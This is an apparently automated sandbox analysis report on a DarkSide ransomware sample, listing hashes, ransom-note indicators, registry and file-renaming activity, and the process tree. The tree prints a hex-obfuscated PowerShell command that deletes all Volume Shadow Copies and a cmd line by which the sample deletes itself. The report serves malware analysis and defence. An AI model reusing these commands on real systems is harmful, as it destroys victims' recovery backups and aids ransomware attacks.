Analysis
-
max time kernel
60s -
max time network
69s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
17-05-2021 14:07
Static task
static1
Behavioral task
behavioral1
Sample
sage2.donotopen.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
sage2.donotopen.exe
Resource
win10v20210408
General
-
Target
sage2.donotopen.exe
-
Size
59KB
-
MD5
7be33b01e9cb99c6e23ae3b02f384a2c
-
SHA1
1f8a236ceafc44eea0c117b9d276d556e3fe53e2
-
SHA256
b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8
-
SHA512
c053fe23f5b25127bfe17d7eabad31aa7c3d696d78373e90d8ced9182598c4315fd0cb02aec12efee120996874894a0ef56671d3db4adedfcccb0b80c4b1c154
Malware Config
Extracted
C:\\README.21b2020d.TXT
darkside
http://darksidfqzcuhtk2.onion/VFBTTQ0UZGCGIMG4WZLMO06HUN6ZQHEF4AY2K88X4GZJQOT106I95CADXOD0MZ39
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
sage2.donotopen.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\SelectExport.crw.21b2020d sage2.donotopen.exe File renamed C:\Users\Admin\Pictures\SkipStop.raw => C:\Users\Admin\Pictures\SkipStop.raw.21b2020d sage2.donotopen.exe File opened for modification C:\Users\Admin\Pictures\SkipStop.raw.21b2020d sage2.donotopen.exe File renamed C:\Users\Admin\Pictures\SelectExport.crw => C:\Users\Admin\Pictures\SelectExport.crw.21b2020d sage2.donotopen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
sage2.donotopen.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP" sage2.donotopen.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP" sage2.donotopen.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Control Panel 1 IoCs
Processes:
sage2.donotopen.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10" sage2.donotopen.exe -
Modifies registry class 5 IoCs
Processes:
sage2.donotopen.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d sage2.donotopen.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d" sage2.donotopen.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon sage2.donotopen.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d sage2.donotopen.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico" sage2.donotopen.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exesage2.donotopen.exepid process 3108 powershell.exe 3108 powershell.exe 3108 powershell.exe 744 sage2.donotopen.exe 744 sage2.donotopen.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
sage2.donotopen.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 744 sage2.donotopen.exe Token: SeSecurityPrivilege 744 sage2.donotopen.exe Token: SeTakeOwnershipPrivilege 744 sage2.donotopen.exe Token: SeLoadDriverPrivilege 744 sage2.donotopen.exe Token: SeSystemProfilePrivilege 744 sage2.donotopen.exe Token: SeSystemtimePrivilege 744 sage2.donotopen.exe Token: SeProfSingleProcessPrivilege 744 sage2.donotopen.exe Token: SeIncBasePriorityPrivilege 744 sage2.donotopen.exe Token: SeCreatePagefilePrivilege 744 sage2.donotopen.exe Token: SeBackupPrivilege 744 sage2.donotopen.exe Token: SeRestorePrivilege 744 sage2.donotopen.exe Token: SeShutdownPrivilege 744 sage2.donotopen.exe Token: SeDebugPrivilege 744 sage2.donotopen.exe Token: SeSystemEnvironmentPrivilege 744 sage2.donotopen.exe Token: SeRemoteShutdownPrivilege 744 sage2.donotopen.exe Token: SeUndockPrivilege 744 sage2.donotopen.exe Token: SeManageVolumePrivilege 744 sage2.donotopen.exe Token: 33 744 sage2.donotopen.exe Token: 34 744 sage2.donotopen.exe Token: 35 744 sage2.donotopen.exe Token: 36 744 sage2.donotopen.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeBackupPrivilege 2716 vssvc.exe Token: SeRestorePrivilege 2716 vssvc.exe Token: SeAuditPrivilege 2716 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
sage2.donotopen.exedescription pid process target process PID 744 wrote to memory of 3108 744 sage2.donotopen.exe powershell.exe PID 744 wrote to memory of 3108 744 sage2.donotopen.exe powershell.exe PID 744 wrote to memory of 4648 744 sage2.donotopen.exe cmd.exe PID 744 wrote to memory of 4648 744 sage2.donotopen.exe cmd.exe PID 744 wrote to memory of 4648 744 sage2.donotopen.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL2⤵PID:4648
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
MD5
67fc7b646bf0ff4129cf65bd31753fd9
SHA17428127d16a308ccd3d4ec950b540f31616322a9
SHA256c87bb7e6b1480fff5001ec8fe03aa2b8868efa618c5576445a0676aaa31764b3
SHA5129f58daffe014a9797c7e1d035f9577eab060d7a22ebc6cc4f40b9e348793d3b4adf27506df7ef5add9c86c6ee7c70d1cc1cb8cc3e9f33d447d72feeb7a32f264